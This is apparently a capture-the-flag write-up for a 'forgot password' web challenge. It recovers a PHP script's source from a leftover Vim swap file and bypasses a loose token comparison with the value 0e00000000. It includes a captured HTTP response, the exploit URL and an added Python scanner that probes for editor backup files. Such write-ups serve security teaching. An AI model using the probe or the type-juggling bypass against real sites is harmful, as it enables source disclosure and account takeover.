Forgot Password
Looking at the source of step1.php, we see it was written with Vim (the page even carries a meta tag: <meta name="editor" content="Vim" />). A Vim session commonly leaves a swap file (.swp) behind, but requesting one directly for step1.php did not work. So we intercepted the request to

http://ctf5.shiyanbar.com/10/upload/step2.php?email=youmail@mail.com&check=???????

with Burp Suite; the captured response is:

HTTP/1.1 200 OK
Date: Wed, 30 Aug 2017 13:28:01 GMT
Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.2.17
X-Powered-By: PHP/5.2.17
Content-Length: 1060
Content-Type: text/html

<meta http-equiv=refresh content=0.5;URL="./step1.php">check error!<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="renderer" content="webkit" />
<meta name="admin" content="admin@simplexue.com" />
<meta name="editor" content="Vim" />
<title>logic</title>
<style type="text/css">
body,html{ position: relative; height: 100%; width: 100%; padding: 0; margin: 0; background-color: #272822; color: #fff; }
form{ position: absolute; top: 50%; left: 50%; width: 400px; margin: -70px -200px; }
form input{ display: block; margin: 10px auto; width: 100%; border: none; height: 2rem; border-radius: 5px; }
</style>
</head>
<body>
<form action="submit.php" method="GET">
<h1>找回密码 step2</h1>
email:<input name="emailAddress" type="text" value="youmail@mail.com" disable="true"/></br>
token:<input name="token" type="text" /></br>
<input type="submit" value="提交">
</form>
</body>
</html>

Two things stand out. First, a wrong check value still gets a 200 OK, with a meta refresh back to step1.php and the text "check error!", so the status code alone says nothing about whether a request succeeded. Second, the step2.php page (the response above) submits its form to yet another file, submit.php. Putting this together, we try .submit.php.swp, and that works: the swap file gives us the source. Note the dot in front of submit (first time I've seen this, learned something new): Vim names the swap file for submit.php as .submit.php.swp in the same directory.
Luckily, step1.php contains the administrator's email address, admin@simplexue.com (the same <meta name="admin" ...> tag is visible in the step2.php response above).
Construct the token 0e00000000. This is a ten-character numeric string that PHP's loose comparison (==) evaluates as the number 0 (scientific notation, 0 x 10^0), which is what the loose token comparison in the recovered submit.php source lets through; the server banner shows PHP/5.2.17, where this behaviour applies. Request:

http://ctf5.shiyanbar.com/10/upload/submit.php?emailAddress=admin@simplexue.com&token=0e00000000
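As an added example (not code from this write-up), here is a small Python probe that automates the swap-file hunt above: it builds the leftover names that Vim and similar editors leave next to a web script, fetches each one, and recognises a real Vim swap file by the "b0VIM" magic at the start of its first block rather than by HTTP status, since the challenge server answers errors with 200 OK. Only the submit.php URL and its .submit.php.swp come from the write-up; the other suffixes are the usual Vim/editor defaults and are assumptions about what might exist, and the opener parameter exists so the logic can be exercised offline.

```python
# Added example for this write-up (not the author's code). Enumerates
# editor leftovers next to a web script, fetches each candidate, and
# classifies the result by content, because the challenge server returned
# 200 OK + "check error!" for failures, so status codes alone mislead.
# Only http://ctf5.shiyanbar.com/10/upload/submit.php and .submit.php.swp
# come from the write-up; the remaining suffixes are assumed defaults.
import urllib.error
import urllib.request

# Vim names its swap file .<name>.swp (then .swo, .swn, ...) in the same
# directory; <name>~ is its backup file when 'backup' is set. The rest are
# common leftovers from other editors and from manual copies.
SUFFIX_PATTERNS = (
    ".{name}.swp",
    ".{name}.swo",
    ".{name}.swn",
    "{name}~",
    "{name}.swp",
    "{name}.bak",
    "{name}.orig",
    "{name}.save",
)

VIM_SWAP_MAGIC = b"b0VIM"  # first bytes of block 0 of every Vim swap file


def swap_candidates(url):
    """Return the candidate leftover URLs for a script URL, most likely first."""
    base, _, name = url.rpartition("/")
    if not name:
        raise ValueError("URL must end in a file name: %r" % url)
    return [base + "/" + pat.format(name=name) for pat in SUFFIX_PATTERNS]


def is_vim_swap(head):
    """True if the first bytes of a response body look like a Vim swap file."""
    return head.startswith(VIM_SWAP_MAGIC)


def classify(status, head):
    """'swap' for a Vim swap file (by magic), 'text' for any other 200
    (a plain backup copy, or an error page served with 200), else None."""
    if status == 200 and is_vim_swap(head):
        return "swap"
    if status == 200:
        return "text"
    return None


def probe(url, timeout=5.0, opener=urllib.request.urlopen):
    """Fetch every candidate and return [(candidate_url, status, label)]
    for the ones worth a look. `opener` is injectable for offline tests."""
    hits = []
    for cand in swap_candidates(url):
        req = urllib.request.Request(cand, headers={"User-Agent": "swp-probe"})
        try:
            with opener(req, timeout=timeout) as resp:
                status, head = resp.status, resp.read(64)
        except urllib.error.HTTPError as err:
            status, head = err.code, b""
        except urllib.error.URLError:
            continue  # unreachable host / DNS failure: nothing to record
        label = classify(status, head)
        if label is not None:
            hits.append((cand, status, label))
    return hits


if __name__ == "__main__":
    for cand, status, label in probe("http://ctf5.shiyanbar.com/10/upload/submit.php"):
        print(status, label, cand)
```

Once a candidate is labelled "swap", save the body and recover the buffer locally with vim -r .submit.php.swp (then :w to write the text out); a quick strings pass over the file is usually enough to read the PHP. The "text" label is deliberately noisy: it catches backup copies that are plain source, but also the site's 200 OK error pages, so read those by hand.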